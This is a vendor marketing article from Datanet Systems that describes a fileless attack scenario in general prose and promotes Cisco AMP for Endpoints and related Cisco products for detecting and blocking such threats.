Almost half of the new generation malware attacks cannot be stopped by traditional protection solutions used on mobile devices. The conclusion belongs to analysts from the Enterprise Security Group (ESG), and the causes will be detailed below. For a better understanding, we propose the analysis of a practical case:

One of your employees receives and opens – on a laptop, tablet, or smartphone – a mail sent apparently by a legitimate sender. The mail contains a link to a site that the employee accesses, but does not know that it automatically loads and exploits an Adobe Flash vulnerability. Which, in turn, launches the Windows PowerShell application that runs scripts sent by a command and control server. Final result: hackers take control of the device you are using.

The above example is the typical scenario of a Fileless Attack, which in 2017 accounted for 77% of the attacks on companies. In 2018, the Fileless technique has begun to be used frequently in attacks that combine several types of threats.

The problem is that such an attack cannot be detected and blocked by classical protection solutions – such as antivirus – for the following reasons:

  • Fileless attacks run on RAM;
  • They use common applications that are considered safe (Web browsers, Microsoft Office, Adobe Reader, etc.);
  • The attacks do not leave enough “traces” for the AV solutions to detect a malware signature. (The reason why they are called “Zero footprint” or “Non-malware” attacks.)

 

Nevertheless, what can you do?

Datanet Systems specialists’ response to this type of threat is Cisco Advanced Malware Protection for Endpoints. The Cisco solution acts on three levels in the case of a Fileless attack:

  • Prevents Critical Situations – AMP for Endpoints automatically identifies and alerts on vulnerabilities of applications installed on mobile devices, prioritizing them based on Common Vulnerabilities and Exposures. CVE Classification gives administrators a clear record of terminals and applications that need patches and updates.
  • Detects the attack – Cisco continually monitors equipment activity in order to identify and block abnormal behaviors of running programs. In addition, by using Cognitive Threat Analytics technology, it detects equipment affected by new-generation attacks, by correlating user-generated traffic data. Another inherent advantage of the solution is the visibility expanded to command line level, which allows administrators to determine whether legitimate applications (such as Windows utilities) are used for other purposes. (AMP for Endpoints can detect changes to Access Control lists, unlawful uses of PowerShell, etc.)
  • Removes the threat – Once a potential risk has been detected in the applications or processes of the operating system, the embedded Exploit-prevention technology changes the structure of RAM even before the attack begins. When an attack is effectively blocked, Cisco closes the affected application and / or process and loads contextual login data into AMP for Endpoints, so that administrators and end-users know exactly where and how the attack occurred.

 

Significant coverage increase

Cisco’s solution, however, has a much broader range of coverage, integrating advanced detection and protection technologies (other than antivirus) such as:

  • File reputation, with the help of which malware threats are quickly recognized and placed in quarantine without any scanning process consuming equipment resources;
  • Identification of polymorphic threats – the solution analyzes the “fingerprints” of the files with risk potential, to detect possible similarities with known malware families;
  • Machine Learning – AMP for Endpoints is “trained” by specific algorithms to learn how to identify files and activities with risk potential based on known malware attributes;
  • Indicators of Compromise – The Cisco Talos Center continuously analyzes malware by building dynamic behavioral patterns of Indicators of Compromise (IoCs) that can quickly detect any new threats. Administrators can write their own customized IoCs (in OpenIOC format) to be used in incidents;
  • “Low prevalence” analyzes – Cisco automatically identifies executables with low presence on terminal equipment (which may be targeted malware threats or Advanced Persistent Threats) and analyzes their behavior in their own sandbox application to identify unknown threats.

 

The answers are swift

Another major advantage of AMP for Endpoints is that it delivers actionable information that ensures a quick response to threats and event prioritization. In addition, file trajectory and device trajectory enable administrators to identify the entry point and how malware propagates.

Respectively, suspicious file behaviors can be analyzed in a secure sandbox environment (delivered to Cloud via Cisco Threat Grid), which provides detailed information. AMP for Endpoints correlates this information with those about new threats and, based on the resulting data, it can automatically quarantine a file when it begins to have abnormal behavior.

 

Analyzes confirm the level of performance

The Cisco solution is nominated as the leader in IDC (Endpoint Security Marketscape) and version 6.0.5 has received NSS Labs recommendation last year. AMP for Endpoints has achieved very good results in Advanced Endpoint Protection tests (100% blocking of HTTP threats, 99.4% of email threats, 100% Docs&Scripts etc.), with a total effective efficiency of 94, 7%.

 

What more can you do?

Datanet specialists can help you expand the protection of mobile users by integrating AMP for Endpoints with other solutions from the Cisco portfolio. Such as, for example, Identity Services Engine (ISE), which, when AMP for Endpoints detects compromised equipment, can restrict network access by putting it in quarantine. In addition, Cisco Umbrella works as a first line of defense against threats, blocking terminal access to IP addresses, URLs and compromised domains, while AnyConnect Mobility Solution secures mobile connections to corporate networks. AMP for Endpoints also integrates with the applications of other vendors. Datanet specialists can help you integrate with solutions such as Splunk SIEM, Swimlane Security Operations Manager, IBM QRadar, LogRhythm Security Intelligence Platform, etc.

If you want to learn more about how Cisco AMP for Endpoints and Datanet Systems specialists can help you improve mobile protection, please contact us at  office@datanets.ro